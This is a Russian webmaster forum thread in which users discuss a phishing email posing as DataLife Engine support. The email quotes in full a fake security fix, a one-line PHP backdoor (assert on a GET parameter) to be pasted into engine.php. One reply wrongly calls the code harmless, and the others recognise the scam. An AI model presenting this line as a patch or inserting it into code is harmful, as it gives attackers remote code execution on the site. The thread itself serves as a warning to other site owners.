Новый вид развода
Страницы: 1
Новый вид развода
Сегодня на почту пришло письмо. Якобы от support@dle-news.ru . Но у меня стоит null версия и они хотят чтоб я установил этот код.

---------------------------------------------------------------------------------

Уважаемые владельцы сайта *****.ru!

Благодарим Вас за использование на Вашем сайте ***** CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта ****** был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: сайт/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);

-------------------------------------------------------------------------------
может это они решили воспользоваться ситуацией с адсенсем и редиректом мобильных устройств
насколько я понимаю этот код доп проверка - ничего злого вроде не видно....
«Превращаю день в ночь, сына в дочь, а ХЗ в ТЗ»
Python(Flask, Scrapy) - my way.
норм, нужно было так:пришлите нам свой /engine/data/dbconfig.php
и поставьте права 777 на файл /uploads/.htaccess
Партнерская программа AliExpress - подходит для всех видов трафика!

Лучший Хостинг - под любые проекты

Цитата
Джон Джоныч пишет:
assert($_GET[striptags]);
Не новый развод - была уж тема таковая.
да, тема старая)
Некоторые попались на этот достаточно наивный развод. Письмо приходит через форму обратной связи на своем же сайте smile:) А там можно в отправителя кого угодно засунуть (от Путина В.В. <putin@president.gov.ru>)
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
я писал об этом.
это несомненно развод.

http://www.cy-pr.com/forum/f35/t73755/m804357
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
23:01 Слипание слов в блоке 
22:56 PHP 8 ломает старые сайты. Кто уже обновился - что отвалилось? 
22:50 РСЯ и тормоза сайта: Яндекс начал штрафовать за плохой PageSpeed? 
20:50 ИКС Яндекс АПдейт 1 апреля 2026. Обновлён алгоритм расчёта 
20:34 Ап выдачи Яндекса 8 апреля - есть движение, но интереснее что творится с AI-ответами Google 
20:28 Почему даже при маленьком трафике сервер умирает? Разбираем реальные причины 
20:00 Как монетизировать сайт игровой тематики. 
22:14 Услуги рассылки Viber|Whatsapp|IMO. 
22:14 Прием платежей для HIGH RISK | Прием платежей без сайта 
18:17 Продам обменник криптовалюты, а также новый обменник под ключ с обучением. Скидки на скрипты обменника 
18:06 Mixmasters - Exchange without AML and KYC 
16:55 Русские народные сказки - оцените! 
16:34 Создам под вашу нишу сетку сайтов-сателлитов для привлечения целевого трафика 
10:35 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
22:50 Список обновленных тем пуст... 
22:33 А вы бегаете? 
18:06 Чак Норрис ушел - 19 марта 2026, 86 лет, семья подтвердила 
16:40 "Вымпелком" предложил белые списки для части абонентов - выборочный интернет вместо полного доступа 
15:29 арбитражники 
14:06 С юмором по жизни! 
10:18 Добро пожаловать в цифровой мир...